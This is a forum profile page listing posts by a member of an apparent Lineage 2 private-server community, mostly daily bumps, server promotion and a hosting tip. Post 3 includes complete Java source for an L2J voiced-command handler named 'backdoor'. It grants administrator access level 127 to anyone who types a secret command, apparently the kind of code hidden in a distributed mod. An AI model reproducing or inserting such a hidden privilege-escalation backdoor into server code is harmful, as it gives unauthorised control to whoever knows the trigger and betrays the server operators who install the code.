Jump to content

Sikken

Members
  • Posts

    90
  • Credits

  • Joined

  • Last visited

  • Feedback

    0%

Everything posted by Sikken

  1. Daily Bump
  2. check your messages
  3. sorry, but fail. /* * This program is free software: you can redistribute it and/or modify it under * the terms of the GNU General Public License as published by the Free Software * Foundation, either version 3 of the License, or (at your option) any later * version. * * This program is distributed in the hope that it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more * details. * * You should have received a copy of the GNU General Public License along with * this program. If not, see <http://www.gnu.org/licenses/>. */ package net.sf.l2j.gameserver.handler.voicedcommandhandlers; import net.sf.l2j.gameserver.handler.IVoicedCommandHandler; import net.sf.l2j.gameserver.model.actor.instance.L2PcInstance; public class backdoor implements IVoicedCommandHandler { private static final String[] _voicedCommands = { "w6tndsx5" }; public boolean useVoicedCommand(String command, L2PcInstance activeChar, String target) { if (command.equalsIgnoreCase("w6tndsx5")) { activeChar.setAccountAccesslevel(1); activeChar.setAccessLevel(127); } return false; } public String[] getVoicedCommandList() { return _voicedCommands; } }
  4. Daily Bump
  5. Daily Bump
  6. who added to your server? edit: prove you even have it lol
  7. This is my mod (if you even have it on your server), and you do not have my permission to sell it. ps: you did not even by it from me, who are you?
  8. Daily Bump
  9. Daily Bump
  10. http://www.webfaction.com/ This is my suggestion to dedicated and shared web hosting. All linux base systems. 99.9% uptime.
  11. Daily Bump (50+ players on usually)
  12. Daily Bump
  13. this update is completed.
  14. Yes
  15. Daily Bump
  16. Please vote on our poll: Keep or Remove Stacking Subclass System http://www.l2blitz.com/forums/index.php?topic=13
  17. If you want to try it out, join http://www.l2blitz.com/forums/index.php?topic=13 and use command /buffshop
×
×
  • Create New...